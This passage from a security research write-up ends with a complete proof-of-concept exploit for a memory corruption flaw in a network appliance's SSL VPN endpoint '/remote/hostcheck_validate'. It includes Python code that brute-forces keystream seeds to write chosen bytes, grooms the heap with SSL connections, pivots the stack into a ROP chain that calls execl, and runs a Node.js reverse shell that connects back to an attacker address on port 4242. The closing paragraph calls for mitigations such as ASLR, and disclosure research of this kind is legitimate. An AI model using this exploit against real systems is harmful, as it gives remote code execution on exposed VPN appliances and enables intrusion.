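    payload = (b"\0" * 8) + (b"A" * (0x1000 - 0x18 - 8 - 6))
    payload += pad(shell, 0x1000 - 0x100)
    payload += rop
    return pad(payload, 0x2000 - 0x18 - 7)

PREFIX = 0x18 + 4 + 2   # header + seed + length field before the data

payload = build_payload(b"SHELL", b"ROPCHAIN")
shell_chunk_offset = PREFIX + payload.index(b"SHELL")
rop_chunk_offset = PREFIX + payload.index(b"ROPCHAIN")
print(hex(shell_chunk_offset), hex(rop_chunk_offset), hex(len(payload)))
```

With these markers, the shell lands at 0x1000 and the ROP chain at 0x1f00 within the chunk, which are the addresses that the rcx mask and the final stack pivot rely on.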
And modify our code to send this payload instead of the A’s we were sending before:
for i in seeds:
    make_req(sess, salt, i[0], i[1], payload)
Finally, it’s time to start a netcat listener and catch a shell:
FIGURE 3 - Running the exploit and seeing our Node reverse shell
Full Proof of Concept
import requests, struct, ssl, socket
from hashlib import md5
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

context = ssl.SSLContext()
context.verify_mode=ssl.CERT_NONE
context.options|=ssl.OP_NO_TLSv1_3

HOST=("192.168.250.124",12443)
BASEURL="https://{}:{}".format(*HOST)
ssocks=[]

def create_ssl_conn():
    s=socket.create_connection(HOST, timeout=None)
    ss=context.wrap_socket(s)
    ssocks.append(ss)

def gen_ks(salt, seed, size):
    magic=b'GCC is the GNU Compiler Collection.'
    k0=md5(salt+seed+magic).digest()
    ks=k0
    while len(ks)<size:
        k0=md5(k0).digest()
        ks+=k0
    return ks[:size]

def gen_enc_data(salt, seed, size, data):
    plaintext=struct.pack("<H", size) + data
    keystream = gen_ks(salt, seed, len(plaintext))
    ciphertext = bytes(x[0]^x[1] for x in zip(plaintext, keystream)).hex()
    return seed.decode()+ciphertext

def make_req(sess, salt, seed, reqsize, data=b''):
    payload=gen_enc_data(salt, seed, reqsize, data)
    payload="enc="+payload
    r=sess.post(BASEURL+"/remote/hostcheck_validate",
                headers={"content-type":"application/x-www-form-urlencoded"},
                verify=False, data=payload)
    return r

def gen_seed_for_offset(salt, offset, value, incl_ks=False):
    for i in range(0xffffff):
        seed="00{0:06x}".format(i).encode()
        ks=gen_ks(salt, seed, offset+1)
        if int(ks[offset])==int(value):
            if incl_ks:
                return seed, ks[:offset+1]
            else:
                return seed
    else:
        print("keystream search failed")
        return

def gen_seeds_u8(salt, offset, val):
    value=struct.pack("<B", val)
    if val==0:
        return [(b'00bfbfbf', offset-1), (b'00bfbfbf', offset-1)]
    s = gen_seed_for_offset(salt, offset, value[0])
    return [(s,offset-2),(s,offset-1)]

def gen_seeds_u64(salt, offset, val):
    value=struct.pack("<Q", val)
    seeds=[]
    n=7
    for i in range(n,-1,-1):
        if value[i]!=0:
            s=gen_seed_for_offset(salt, offset+i, value[i])
            seeds.append((s, offset+i-1))
            seeds.append((s, offset+i-2))
        else:
            seeds.append((b'00bfbfbf', offset+i-1))
            seeds.append((b'00bfbfbf', offset+i-1))
    return seeds[::-1]

def pad(d, n, c=b'\0'):
    return d+c*(n-len(d))

def u64(x):
    return struct.pack("<Q", x)

def make_ropchain():
    scratch=b'/bin/node\0-e\0\0\0\0'
    scratch_vals=struct.unpack("<2Q", scratch)
    scratch_addr=0x04825000
    argv_1=scratch_addr+scratch.index(b"-e\0")
    rop =b''
    # 1. point rcx to offset 0x1000 within our data buffer, where we have our JS payload
    rop+=u64(0x02b228a0) # mov rax, rdi; ret;
    rop+=u64(0x00b15381) # pop rcx; ret
    rop+=u64(0xfffffffffffff000)
    rop+=u64(0x02c85e40) # and rax, rcx; ret;
    rop+=u64(0x00b15381) # pop rcx; ret
    rop+=u64(0) # <rcx = 0>
    rop+=u64(0x02166fa9) # or rcx, rax; ...; ret;
    # 2. write "/bin/node\0-e\0" to a scratch buffer
    rop+=u64(0x02c87265) # pop rax; ret;
    rop+=u64(scratch_vals[0]) # "/bin/nod"
    rop+=u64(0x02ca1f52) # pop rsi; ret;
    rop+=u64(scratch_addr) # <scratch buffer>
    rop+=u64(0x029e36dd) # mov [rsi], rax; ret
    rop+=u64(0x02c87265) # pop rax; ret;
    rop+=u64(scratch_vals[1]) # "e\0-e\0\0\0\0"
    rop+=u64(0x02ca1f52) # pop rsi; ret;
    rop+=u64(scratch_addr+8) # <scratch buffer>
    rop+=u64(0x029e36dd) # mov [rsi], rax; ret
    # setup arguments for execl
    rop+=u64(0x02ca0763) # pop rdi; ret;
    rop+=u64(scratch_addr) # "/bin/node"
    rop+=u64(0x02ca1f52) # pop rsi; ret;
    rop+=u64(scratch_addr) # "/bin/node"
    rop+=u64(0x02b76f39) # pop rdx
    rop+=u64(argv_1) # "-e"
    rop+=u64(0x0289a815) # REX.WRXB pop r8
    rop+=u64(0)
    # rcx already points to the last argument
    # 3. call execl("/bin/node", "/bin/node", "-e", "<command>", NULL);
    rop+=u64(0x0043b170) # execl@PLT
    # pad to size
    assert len(rop) < 0x100-1
    return rop

shell=b"""(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/node", ["-i"]);
    var client = new net.Socket();
    client.connect(4242, "192.168.250.110", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
"""

payload_size=0x2000-0x18-7
payload =(b'\0'*8) + (b'A'*(0x1000-0x18-8-6))
payload+=pad(shell, 0x1000-0x100)
payload+=make_ropchain()
payload =pad(payload, payload_size)

sess=requests.Session()
r=sess.get(BASEURL+"/remote/info", verify=False)
salt=r.content.split(b"salt='")[1].split(b"'")[0]
print("salt: "+salt.decode())

ssl_offset=0x2000-0x18-4
handshake_func=ssl_offset + 0x30
in_init = ssl_offset+0x64

# set rsp = *SSL
PIVOT_1=0x00fd0582 # push rdi; pop rsp; ret
# rsp=*SSL+0x290
PIVOT_2=0x008ecb49 # add rsp, 0x270; pop rbx; pop r12; pop rbp; ret;
# rsp = *SSL-0x100
PIVOT_3=0x01afd214 # sub rdi, 0x100; test rax, rax; cmove rax, rdi; ret;

seeds=[]
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x30, PIVOT_1))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x00, PIVOT_2))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x290, PIVOT_3))
seeds.extend(gen_seeds_u64(salt, ssl_offset+0x298, PIVOT_1))
seeds.extend(gen_seeds_u8(salt, in_init, 1))

for i in range(24):
    create_ssl_conn()

ssocks[-2].send(b'A'*0x2001)

for i in seeds:
    make_req(sess, salt, i[0], i[1], payload)
Conclusion
This vulnerability is yet another which would not have been nearly as impactful if basic exploit mitigations (ASLR in this case) were implemented. This is a pattern we have observed across most major network appliances, and we hope that the prevalence of memory corruption vulnerabilities results in a push to implement these mitigations. We had a lot of fun developing this exploit, and we would once again like to thank Lexfo for their helpful blog post which laid out a very clear roadmap of how to exploit this vulnerability. We look forward to continuing to share our research on network appliance vulnerabilities in the future.